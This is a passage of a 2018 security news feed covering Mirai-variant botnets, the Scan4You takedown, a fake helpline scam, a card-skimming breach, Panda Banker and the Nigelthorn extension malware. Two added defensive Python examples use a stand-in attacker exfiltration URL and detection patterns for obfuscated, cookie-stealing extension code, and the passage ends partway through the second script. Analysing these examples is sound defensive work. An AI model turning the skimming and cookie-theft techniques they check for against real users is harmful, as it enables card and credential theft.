Searching for a link between Wicked, Sora, Owari, and Omni, the security researchers at Fortinet found a conversation with the Owari/Sora IoT botnet author dating back to April.

The vxer, who goes by the online handle “Wicked,” said at the time that he had abandoned the Sora botnet and was working on the Owari one.

The conversation suggests the author has since abandoned both the Sora and Owari bots and is currently working on the Omni project.

“Based on the author’s statements in the above-mentioned interview as to the different botnets being hosted in the same host, we can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author’s succeeding projects,” Fortinet concludes.

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.


Updated – The new Wicked Mirai botnet leverages at least three new exploits

Update May 19, 2018 – Speaking with MalwareMustDie

I have contacted MalwareMustDie for a comment on the Wicked Mirai botnet.

Below are the observations they shared with me:

  • Same coder.
  • The author put all of the high-possibility exploit code in Mirai
  • GPON seemed to be used in a separate pwn scheme by a different script outside of Mirai, but was being used to infect with Mirai.

MalwareMustDie researchers told me that they passed the identity of the author to the relevant country’s LEA. They explained to me that even though they made several reports to the authorities, law enforcement failed to prevent the spread of the malicious code. The experts showed me an official report to the LEA dated January 2018, in which they alerted authorities to the propagation of new Mirai variants.

“the ID of the actor was passed to the related country LEA from our team that investigated result too since we published the Satori/Okiru variant a while ago, way before ARC CPU variant was spotted.” MMD told me.

“So by the release of the OWARI, SORA, and WICKED, this is what will happen if we let the malware actor running loose unarrested. More damage will be created and they just don’t know how to stop them self.”

Pierluigi Paganini

(Security Affairs – Wicked Mirai, botnet)

The post Updated – The new Wicked Mirai botnet leverages at least three new exploits appeared first on Security Affairs.

A Five-Year Journey: How Trend Micro Helped Bring Down Scan4You

Trend Micro has always had a close relationship with law enforcement around the globe, because we believe that only together can we make the world a safer place in which to exchange digital information. As the business of cybercrime continues to grow and evolve, so must our response. That’s why we were delighted to be able to help the FBI in a five-year, trans-national case which has seen two suspects brought to trial and the end of the notorious Counter AV (CAV) service Scan4You.

As detailed in our new report, the case highlights not only the strength of Trend Micro’s intelligence gathering and investigative support, but the often arduous nature of cybercrime policing.

A long and winding road

CAV services are a key part of the global cybercrime industry, allowing would-be attackers to test the effectiveness of their malware without the risk of being detected. Without them, attacks would not be nearly so successful. Scan4You was one of the most prolific out there, having gained the hard-won trust of countless black hats. But Trend Micro researchers had other ideas.

Back in 2012, while researching a private exploit kit called g01pack, we spotted some unusual activity. Just minutes before the exploits were used in the wild, somebody using IP addresses in Latvia checked whether Trend Micro’s web reputation system already blocked the URLs hosting the exploits. On closer inspection we noticed those IP addresses were not only checking g01pack’s exploit URLs but many others. We had just found Scan4You, an underground service which let cybercriminals check their latest malware against over 35 commercial AV engines.

Over the next five years we charted the rise of the service, sharing evidence with the FBI in 2014 which ultimately helped lead investigators to arrest and bring to trial two suspects. During that time, we found that site administrators ‘Borland’ and ‘Garrik’ had ties to numerous other cybercrime activities. These included Eva Pharmacy, one of the oldest operations around using spam and SEO tactics to sell prescription drugs, as well as campaigns using banking trojans and the sale of stolen credit card details.

The fight goes on

Boland and Garrik were arrested last year as part of an international policing operation, after which time we noticed all Scan4You scanning activity stopped. Even better, we’ve not seen a sizeable spike in users of rival CAV services such as VirusCheckMate, so it looks like the investigation has had a real impact on the cybercrime underground.

This is why Trend Micro has always worked closely with law enforcement. Protecting our customers is vital, but it’s also important to try and effect change by disrupting cybercrime itself. Since 2013, our 20 partnerships with the likes of the FBI, Interpol, Europol, the UK’s National Crime Agency (NCA) and more have certainly worked hard to do just that. In fact, a Scan4You reseller was recently sentenced to two years behind bars after a joint investigation between the NCA and Trend Micro.

It has been rewarding to see that Trend Micro’s cooperation with intelligence investigators helped to bring the Scan4You suspects to trial: it’s testament to the broad base of world-leading in-house skills and capabilities we have amassed over the past 30 years. Cybercrime is usually portrayed on TV or in the movies in a rather stereotyped, high-octane “good versus evil” battle. The truth, as we’ve seen, is rather more mundane, and cases take much longer than 90 minutes to crack.

So, let’s celebrate this success, but steel ourselves for more hard work to come. With close co-operation like this, police and security vendors like ourselves can make life increasingly uncomfortable for the bad guys. They’ve had it easy for far too long. So let’s take the fight to them as we continue on our mission to secure the connected world.

The post A Five-Year Journey: How Trend Micro Helped Bring Down Scan4You appeared first on .

Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market

Data from the first quarter of 2018 revealed that the cybersecurity threats landscape is changing. As noted by CSO Online, cryptojacking continues to gain ground: In the first quarter of 2018, 28 percent of companies reported crypto-mining malware, up from just 13 percent in Q4 2017.

According to Nasdaq, meanwhile, ransomware remains a critical threat. BlackRuby, SamSam and GandCrab all made an impact over the last three months, with GandCrab’s ransom demand marking the first time malicious actors asked for payment in Dash digital currency.

But there’s another story here: The growing division (and multiplication) of the zero-day market.

The Attack Surface Expands

As Computer Weekly reported, the total number of malware families grew by 25 percent last quarter while unique variants saw a 19 percent boost. In addition, cybercriminals are now taking the time to conduct reconnaissance on potential targets and leverage automation to maximize attack impact. The Nasdaq piece pointed to the Olympic Destroyer malware, which was specifically designed to interfere with the global sporting event in Pyeongchang this year.

Corporate attack surfaces are also expanding thanks to the uptake of Internet of Things (IoT) technologies. Three of the top 20 reported cybersecurity threats last quarter targeted these devices. Although 60 percent of all web traffic is now encrypted, this “represents a real challenge for traditional security technology that has no way of filtering encrypted traffic.” So it’s no surprise that zero-day threats haven’t received as much attention, even as the market for discovery and distribution evolves.

No Zero-Sum Game

According to Fortinet’s “Threat Landscape Report Q1 2018,” the zero-day market is maturing. While there were 214 zero-day threats discovered in all of 2017, 45 were found in Q1 2018 alone, affecting everything from popular content management systems (CMSs) to device makers and industry-leading operating system (OS) developers. Division of the market by “hat” — white-, gray- and black-hat IT experts — has produced three distinct zero-day streams:

  • White hat: This market supports bug bounty programs, which pay law-abiding security professionals to find new vulnerabilities, but secure disclosure and patching of these bugs is critical to limit accidental exposure.
  • Gray hat: Here, zero-day “brokers” purchase bugs for customers. The caveat is that these customers are typically anonymous. The Fortinet report noted that it’s “possible that the buyer is a hostile nation-state, cybercriminal enterprise or otherwise maliciously inclined.”
  • Black hat: For black-hat actors, the goal is to both find and create new zero-day exploits for profit, and threat researchers have confirmed that “the creation and distribution of zero days by cybercriminals is on the rise.”

This triple-threat market adds up to a kind of multiplicative effect: Companies concerned about zero-day bugs invest more money into white-hat programs to find and eliminate them, while for-profit gray- and black-hat actors look to discover and create new bugs to continue the cycle.

Transformative Cybersecurity Threats

The Fortinet report emphasized that the rise of malware innovation, IoT risks, cryptojacking and zero-day threats “points to the continued transformation of cybercrime.” Specifically, companies need to do the math on zero-day exploits — division of outcomes, combined with multiplying interest, makes this a market to watch in 2018.

The post Cybersecurity Threats in 2018: Cryptojacking, Ransomware and a Divided Zero-Day Market appeared first on Security Intelligence.

Fake Malwarebytes helpline scammer caught in the act

An estimated one in every 10 American adults lost money in a cyber scam in the past 12 months, according to a report released by the FTC earlier in the month. On average, each scam victim lost $430, totaling about $9.5 billion overall.

To put this in perspective, that’s over 22 million Americans scammed for $26 million a day, more than $1 million an hour, $18,000 per second.

No one is immune, and now more than ever there is a need to be vigilant. Being taken by a scam can ruin lives or damage the reputation of legitimate companies. No one is excluded—not Amazon, Dell, Malwarebytes, or you.

In the example below, we’ll show how the scammers at Blue Eye Ventures, LLC, tried to imitate Malwarebytes in order to trick people out of money. Now, more than ever, it’s important to be vigilant in order to tell the good guys from the bad.

Malwarebytes helpline scam

Using a modern web design aesthetic, Blue Eye Ventures makes a reasonably good impression of a company looking to help its clients. They advertise that they are a Malwarebytes helpline. But they are not.

In order to catch these guys in the act, I called the toll-free number asking for help, telling them I wasn’t sure my Malwarebytes software was working properly. I allowed the technician to have access to my computer. He opened up my Malwarebytes software.

I’m sorry sir, this is fake software

The technician on the phone advised me that the (legitimate) Malwarebytes software I was running was fake. Now, I knew that it was not fake. I ran it minutes earlier and it worked perfectly.

Next thing I knew, he ran a tree command. Tree is a recursive directory listing program that produces a depth-indented listing of files. It is not a diagnostic tool.

These are the results he produced:

At the bottom of the tree command, he typed “Security Breach” to scare me into believing that my computer was being hacked.

More scare tactics

He then checked my System Configuration:

The tech told me that all my software wasn’t running. “It’s stopped.” This was to scare me into believing that my system wasn’t working. Again, he wasn’t using any tools to diagnose hacking or infections.

He then pulled up Resource Monitor:

The tech asked me, “Do you know what csrss.exe means?” I told him I didn’t, even though I do.

The csrss.exe file located in C:\Windows\System32 is a real file, and removing it will cause problems with your PC. If someone tells you it’s a virus, that’s a hoax.

Case in point, to further scare me into believing my computer was infected, the tech asked me to read the description he pulled up on Google about the csrss.exe file being a Trojan horse or virus.

The Google result pulls information from an unreliable and untrustworthy source. For example, the article linked there recommends that users remove this “malware” from their Mac systems, yet any file ending in .exe is a Windows executable.

Meanwhile, the scammer still hadn’t checked my system with any real tools to find problems. He was only there to scare me into purchasing his plans.

Do not purchase

Below are the plans he offered me, from one year of support for $200 to a lifetime plan for $700. I was instructed to pay Blue Eye Ventures, LLC, by check. Or I could use my credit card at Easy-installatio.com (phone number +120-3354649). This is a Canadian number—and Malwarebytes’ HQ is in the United States.

How do you think a real customer would feel? They purchased Malwarebytes and now they are being told that they purchased phony software, their computer is infected, and it’s going cost them hundreds of dollars to repair. Scammers are not only ruining the reputation of legitimate companies, but they are ripping customers off in the process.

At Malwarebytes, we are always working to expose fraud and educate consumers. We will never sell phony software. We will never charge you hundreds of dollars to fix your computer. And we will teach you how to spot the companies who do.

The post Fake Malwarebytes helpline scammer caught in the act appeared first on Malwarebytes Labs.

Phishers increasingly targeting cloud storage and SaaS

The Anti-Phishing Working Group (APWG) has been tracking notable increases in phishing campaigns that target SaaS/webmail providers, as well as increased attacks on financial/banking targets and cloud storage and file-sharing sites. But banks remain the most popular targets, with phishers stealing customers’ online banking credentials. APWG member MarkMonitor detected phishing attacks targeting 454 organizations in the fourth quarter of 2017, and 60 percent of those organizations were financial institutions. The total number of … More

The post Phishers increasingly targeting cloud storage and SaaS appeared first on Help Net Security.

Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.

The Mexican central bank is the latest victim of the SWIFT hackers; officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents,” Reuters reported.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

According to reports, Mexico’s central bank, following the latest cyber attacks, has created a cybersecurity division and has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.

Pierluigi Paganini

(Security Affairs – Mexican central bank, SWIFT)

The post Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks appeared first on Security Affairs.

Ransomware-as-a-Service (RaaS): How It Works

Ransomware isn’t a new threat to the cyber world. Its origins go back many years now. Over time, this threat has become only more vicious and harmful. While people were trying to deal with this cyber threat, cybercriminals moved one step further by offering ransomware-as-a-service (RaaS). Under this service, cybercriminals provide a compact malicious kit […]… Read More

The post Ransomware-as-a-Service (RaaS): How It Works appeared first on The State of Security.


McAfee Blogs: Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change default passwords when they purchase new devices and that only 35% of us know how to properly check if our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it but it’s so worth it. If your privacy is compromised, your identity can be easily stolen. Which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

McAfee Blogs

Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than they were five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change the default passwords when they purchase new devices, and that only 35% of us know how to properly check whether our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it, but it’s so worth it. If your privacy is compromised, your identity can easily be stolen, which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

  • Use comprehensive security software such as McAfee® Total Protection. You know it will guard you against viruses and threats. But do you realise it will also direct you away from dangerous downloads and risky websites – where privacy can easily come unstuck!
  • McAfee® Total Protection will also protect your smartphone and tablet, and can back up your important files.

 2. Manage Your Passwords

  • Ensure every one of your online accounts and every one of your devices has its own unique password – never reuse one, because a breach at one site is then a breach everywhere. Ideally it combines lower and upper case letters, numbers and special characters, or is a long passphrase. I love using a nonsensical, crazy sentence. A password manager is what makes keeping dozens of unique passwords practical.

 3. Think Before You Download Apps

  • Never download apps from unknown sources. They may be designed to harvest your personal information. Always read reviews to see if anyone has had a problem, and check out the app’s fine print before you download.
  • Review the apps that you have signed up to with Facebook. As the recent Cambridge Analytica situation showed, Facebook provides some of these apps with users’ private information including name, location, email or even friends list.
    So, please review these apps, people. Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you.

 4. Lock Down Your Home Wi-Fi

  • To prevent hackers from accessing your fleet of IoT devices at home (including your virtual assistant, your lighting or your security systems), secure your home Wi-Fi with a complex password – and make sure the network is using WPA2 encryption, because a strong password on an open or WEP network protects nothing. Every device’s factory default password needs to be changed as well.
  • McAfee’s Secure Home Platform – available soon on D-Link – can secure devices through your internet router to ensure every internet-connected device in your house is safe. How good is that???

 5. Stay On Top Of Software Updates

  • Check all your devices to ensure your software (operating systems, apps) is up-to-date.
  • Out-of-date software usually means a known security vulnerability is still unpatched, which makes it so much easier for a cybercriminal to access your device and online life.
  • Why not schedule updates so this happens automatically?

 6. Be Wary Using Wi-Fi Outside Home Or Work

  • Avoid using public or unsecured Wi-Fi, especially when entering personal information online, as it can expose you to all sorts of nasty attacks.
  • Use a Virtual Private Network (VPN) such as McAfee® Safe Connect to encrypt your connection and keep your data secure when you are on a network you don’t control.

 7. Multi-Factor Authentication

And don’t forget about your kids! Teaching them the importance of proactively managing their online privacy is essential. As parents, we need to help our kids develop a toolkit of skills and knowledge, so they can prepare themselves for life’s challenges. So please share this with them – you’ll be doing them a big favour.

Alex x

The post Get Your Online Privacy Under Control appeared first on McAfee Blogs.

Rail Europe North America hit by payment card data breach

Rail Europe North America (RENA) has notified customers of a security breach: crooks compromised its website with malware used to siphon payment card data.

The website allows users to buy European train tickets. According to the company, the breach lasted nearly three months (between November 29, 2017 and February 16, 2018) and exposed customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known-safe code and removed any potentially untrusted components. Its IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”

Pierluigi Paganini

(Security Affairs – Rail Europe North America, data breach)

The post Rail Europe North America hit by payment card data breach appeared first on Security Affairs.

The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3

This week in Tripwire’s countdown of the FBI’s 10 most-wanted black-hat hackers, we name three hackers bound together in digital crime: Wen Xinyu, Huang Zhenyu and Sun Kailiang. The suspects made headlines in May 2014 when the United States Department of Justice indicted five suspected Chinese nationals for allegedly committing economic and cyber espionage against […]

The post The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3 appeared first on The State of Security.

6 Best Practices to Avoid Leaks in 2018

One of the most dangerous threats to your business in 2018 is a data leak. Hackers can sell your information on the black market or simply destroy it. This could ruin your business overnight if you are not careful. So, you should use the best practices below to ensure you avoid leaks in 2018. Phishing […]

The post 6 Best Practices to Avoid Leaks in 2018 appeared first on The State of Security.

PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media

Security firm F5 recently detailed several newly discovered campaigns leveraging the Panda Banker malware to target financial institutions; the largest one targeted banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan with the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

Panda Banker was first spotted in 2016 by Fox-IT. It borrows code from the Zeus banking Trojan and is sold as a kit on underground forums. In November 2017, the threat actors behind Zeus Panda used black-hat Search Engine Optimization (SEO) to push malicious links into search results for financial-related keyword queries.

Panda Banker’s main purpose is stealing credentials and account numbers; it steals money from victims through “man in the browser” attacks, hooking the browser so it can read and rewrite banking pages and transactions as the victim uses them.

According to F5, the malware continues to target Japanese institutions and it is also targeting users in the United States, Canada, and Latin America.

“We analyzed four campaigns that were active between February and May of 2018. The three May campaigns are still active at the time of this writing. Two of the four campaigns are acting from the same botnet version but have different targets and different command and control (C&C) servers.” reads the analysis published by F5.

“Panda is still primarily focused on targeting global financial services, but following the worldwide cryptocurrency hype, it has expanded its targets to online cryptocurrency exchanges and brokerage services. Social media, search, email, and adult sites are also being targeted by Panda.”

Experts observed a spike in activity associated with the malware in February, when it was used to target financial services and cryptocurrency sites in Italy with screenshots rather than webinjects. With this technique, the attackers can spy on user interaction with cryptocurrency accounts.

“The Panda configuration we analyzed from February was marked as botnet “onore2.” This campaign leverages the same attack techniques as previously described, and it is able to keylog popular web browsers and VNC in order to hijack user interaction session and steal personal information.” states the analysis.

Panda-banker-by-industry

In May, the experts monitored three different Panda Banker campaigns each focused on different countries.

One of them, tracked by F5 as botnet “2.6.8,” had targets in eight industries in North America; most of the targets (78%) were US financial organizations.

“This campaign is also targeting major social media platforms like Facebook and Instagram, as well as messaging apps like Skype, and entertainment platforms like Youtube. Additionally, Panda is targeting Microsoft.com, bing.com, and msn.com,” says F5.

Experts discovered that the same botnet 2.6.8 is also targeting Japanese financial institutions.

Comparing the two botnet configurations reveals that when Zeus.Panda targets Japan, the authors set remove_csp: 1, which strips the Content-Security-Policy (CSP) headers from the bank’s responses. CSP is a browser security standard for preventing cross-site scripting (XSS), clickjacking and other code injection attacks that could execute malicious code on an otherwise trusted site. Because Panda sits inside the browser and can rewrite a response before the policy is enforced, removing the header lets its webinjects run where the site’s own policy would otherwise block them.
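
Both the front-end skimmer in the Rail Europe breach above and Panda’s remove_csp setting meet the same control, Content-Security-Policy: a tight policy stops an injected script from loading, or from posting card data to another host, and a man-in-the-browser that strips the header removes that protection before the browser ever sees it. The Python below is an added example (not F5’s analysis, not RENA’s code, not any vendor’s product) that parses a CSP header, decides whether an injected inline script, an external attacker script or an exfiltration request would be permitted, and models what stripping the header changes. The shop origin, the attacker hostname and the policy strings are constructed for the example.

```python
"""What a Content-Security-Policy header permits, and what stripping it changes.

Added example; not code from the Rail Europe notice, F5's analysis or any vendor.
The shop origin, the attacker host and the policies are constructed for illustration.
"""
from urllib.parse import urlparse

# Fetch directives that fall back to default-src when absent (form-action does not).
FALLBACK = {"script-src": "default-src", "connect-src": "default-src", "img-src": "default-src"}
# Source expressions that govern inline content, not network destinations.
INLINE_ONLY = ("unsafe-inline", "unsafe-eval", "nonce-", "sha256-", "sha384-", "sha512-")
DEFAULT_PORT = {"https": 443, "http": 80}

SHOP_ORIGIN = "https://shop.example"                    # constructed
ATTACKER_URL = "https://collect.attacker.invalid/p.php"  # constructed skimmer drop
CHECKOUT_HEADERS = {                                    # constructed checkout response
    "Content-Type": "text/html",
    "Content-Security-Policy": "default-src 'self'; script-src 'self' https://js.psp.example; "
                               "connect-src 'self'; form-action 'self'",
}


def parse_csp(header):
    """Split "dir src src; dir src" into {directive: [source expressions]}."""
    policy = {}
    for clause in header.split(";"):
        parts = clause.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def _host_matches(pattern, host):
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:]) and host != pattern[2:]
    return host == pattern


def _source_allows(source, url, page_origin):
    """Does one source expression permit a request to url from a page at page_origin?"""
    src = source.strip("'").lower()
    target = urlparse(url)
    if src == "self":
        return f"{target.scheme}://{target.netloc}" == page_origin
    if src == "none" or src.startswith(INLINE_ONLY):
        return False
    if src.endswith(":"):                       # scheme source such as https:
        return target.scheme == src[:-1]
    scheme, _, rest = src.rpartition("://")    # [scheme://]host[:port][/path]
    if scheme and target.scheme != scheme:
        return False
    host, _, port = rest.split("/", 1)[0].partition(":")
    target_port = target.port or DEFAULT_PORT.get(target.scheme)
    if port and port != "*" and port != str(target_port):
        return False
    return _host_matches(host, target.hostname or "")


def sources_for(policy, directive):
    """Governing source list for a directive, honouring fallback; None means unrestricted."""
    if directive in policy:
        return policy[directive]
    fallback = FALLBACK.get(directive)
    return policy.get(fallback) if fallback else None


def allows_url(policy, directive, url, page_origin):
    sources = sources_for(policy, directive)
    return True if sources is None else any(_source_allows(s, url, page_origin) for s in sources)


def allows_inline_script(policy):
    """Would an injected <script> carrying no nonce or hash execute?"""
    sources = sources_for(policy, "script-src")
    if sources is None:
        return True
    lowered = [s.strip("'").lower() for s in sources]
    if any(s.startswith(("nonce-", "sha256-", "sha384-", "sha512-")) for s in lowered):
        return False                            # browsers ignore 'unsafe-inline' once a nonce/hash is present
    return "unsafe-inline" in lowered


def strip_csp(headers):
    """Model Panda's remove_csp: 1 -- the header never reaches the page."""
    drop = ("content-security-policy", "content-security-policy-report-only")
    return {k: v for k, v in headers.items() if k.lower() not in drop}


def assess(headers, page_origin=SHOP_ORIGIN, attacker_url=ATTACKER_URL):
    """What an injected skimmer or webinject could do on a page served with these headers."""
    policy = {}
    for name, value in headers.items():
        if name.lower() == "content-security-policy":
            policy = parse_csp(value)
    return {
        "inline_script_runs": allows_inline_script(policy),
        "attacker_script_loads": allows_url(policy, "script-src", attacker_url, page_origin),
        "exfil_via_fetch": allows_url(policy, "connect-src", attacker_url, page_origin),
        "exfil_via_form_post": allows_url(policy, "form-action", attacker_url, page_origin),
    }


if __name__ == "__main__":
    print("with CSP:    ", assess(CHECKOUT_HEADERS))
    print("CSP stripped:", assess(strip_csp(CHECKOUT_HEADERS)))
```

Two cases fall out of it. A policy like the constructed one would have contained a skimmer dropped into the page, provided the attacker could not also edit the response headers, which a full platform compromise of the kind RENA describes may well allow. Against Panda the policy is irrelevant however it is written, because the malware removes it on the endpoint before enforcement; that is why endpoint hygiene and out-of-band transaction verification still matter even for sites with a strong CSP.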

This last campaign also targets Amazon, YouTube, Microsoft.com, Live.com, Yahoo.com, Google.com, Facebook, Twitter and a couple of other sites.

The third campaign targeted financial institutions in Latin America, mostly in Argentina, Colombia and Ecuador. The same campaign also targeted social media, search, email, entertainment and tech providers, as in the other attacks.

“This act of simultaneous campaigns targeting several regions around the world and industries indicates these are highly active threat actors, and we expect their efforts to continue with multiple new campaigns coming out as their current efforts are discovered and taken down,” F5 concludes.

Pierluigi Paganini

(Security Affairs – Panda Banker, malware)

The post PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media appeared first on Security Affairs.

Nigelthorn malware infected over 100,000 systems abusing Chrome extensions

The Nigelthorn malware has already infected over 100,000 systems in 100 countries by abusing a Google Chrome extension called Nigelify.

A new strain of malware, dubbed Nigelthorn because it abuses a Google Chrome extension called Nigelify, has already infected over 100,000 systems in 100 countries, over 75% of them in the Philippines, Venezuela and Ecuador.

The new malware family is capable of credential theft, cryptomining, click fraud, and other malicious activities.

According to the experts, the threat actor behind this campaign has been active since at least March 2018.

The Nigelthorn malware spreads through links on Facebook: victims are redirected to a fake YouTube page that asks them to download and install a Chrome extension to play the video. Once the victim accepts the installation, the malicious extension is added to their browser.

“Radware has dubbed the malware “Nigelthorn” since the original Nigelify application replaces pictures to “Nigel Thornberry” and is responsible for a large portion of the observed infections.” reads the analysis published by Radware.

“The malware redirects victims to a fake YouTube page and asks the user to install a Chrome extension to play the video.”

The malware specifically targets Windows and Linux machines running the Chrome browser.

When a victim clicks “Add Extension”, they are redirected to a Bitly URL and from there to Facebook, in an attempt to harvest the credentials for their account.

To bypass Google’s extension validation tools, the threat actors took copycat versions of legitimate extensions and injected a short, obfuscated malicious script into them.

“To date, Radware’s research group has observed seven of these malicious extensions, of which it appears four have been identified and blocked by Google’s security algorithms. Nigelify and PwnerLike remain active,” reads the analysis.

After the malicious extension is installed, a JavaScript payload starts the attack by downloading the malware configuration from the command and control (C&C) server, after which a set of requests is sent.

The Nigelthorn malware steals Facebook login credentials and Instagram cookies. It also redirects users to a Facebook API endpoint to generate an access token, which is then sent to the C&C servers.

The malware propagates using the stolen credentials: it sends the malicious link to the victim’s network either via messages in Facebook Messenger or via a new post that tags up to 50 contacts.

The Nigelthorn malware also downloads a cryptomining tool to the victim’s computer.

“The attackers are using a publicly available browser-mining tool to get the infected machines to start mining cryptocurrencies.” states Radware. “The JavaScript code is downloaded from external sites that the group controls and contains the mining pool. Radware observed that in the last several days the group was trying to mine three different coins (Monero, Bytecoin and Electroneum) that are all based on the “CryptoNight” algorithm that allows mining via any CPU.”

The malicious code uses several techniques to maintain persistence on the infected system, such as closing the extensions tab if the user tries to open it, or downloading URI regexes from the C&C that block users from accessing Facebook and Chrome cleanup tools, or from editing, deleting posts and posting comments.

Experts also described YouTube fraud: a YouTube plugin is downloaded and executed, after which the malware requests the URI “/php3/youtube.php” on the C&C to receive commands to watch, like or comment on a video, or to subscribe to a channel. These actions are likely an attempt to earn payments from YouTube.

“As this malware spreads, the group will continue to try to identify new ways to utilize the stolen assets. Such groups continuously create new malware and mutations to bypass security controls. Radware recommends individuals and organizations update their current password and only download applications from trusted sources,” concludes Radware.
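
The traits Radware lists (copycat extensions carrying a short obfuscated stub, cookie and credential theft from social sites, configuration fetched from a C&C, and closing the chrome://extensions tab to resist removal) are all visible statically in an unpacked extension. The Python below is an added example, not Radware’s tooling: it triages an extension’s manifest.json and scripts for those traits and returns a verdict with the evidence. The two sample extensions, the indicator lists and the verdict rule are constructed for the example; the C&C hostname is hypothetical.

```python
"""Static triage of an unpacked Chrome extension for Nigelthorn-style traits.

Added example, not Radware's tooling. The two sample extensions and the
indicator lists are constructed for illustration; the verdict rule is the author's.
"""
import json
import re

RISKY_PERMISSIONS = {"cookies", "tabs", "webRequest", "webRequestBlocking",
                     "history", "management", "<all_urls>", "*://*/*"}
SOCIAL_HOSTS = ("facebook.com", "instagram.com")

OBFUSCATION = {
    "eval": re.compile(r"\beval\s*\("),
    "Function_constructor": re.compile(r"\bFunction\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode_run": re.compile(r"String\.fromCharCode\s*\((?:\s*\d+\s*,){8,}"),
    "hex_escape_run": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
}
BEHAVIOUR = {
    "remote_code_load": re.compile(r"\b(?:fetch|XMLHttpRequest)\b[\s\S]{0,200}?https?://"),
    "reads_cookies": re.compile(r"chrome\.cookies\.(?:get|getAll)\b|document\.cookie"),
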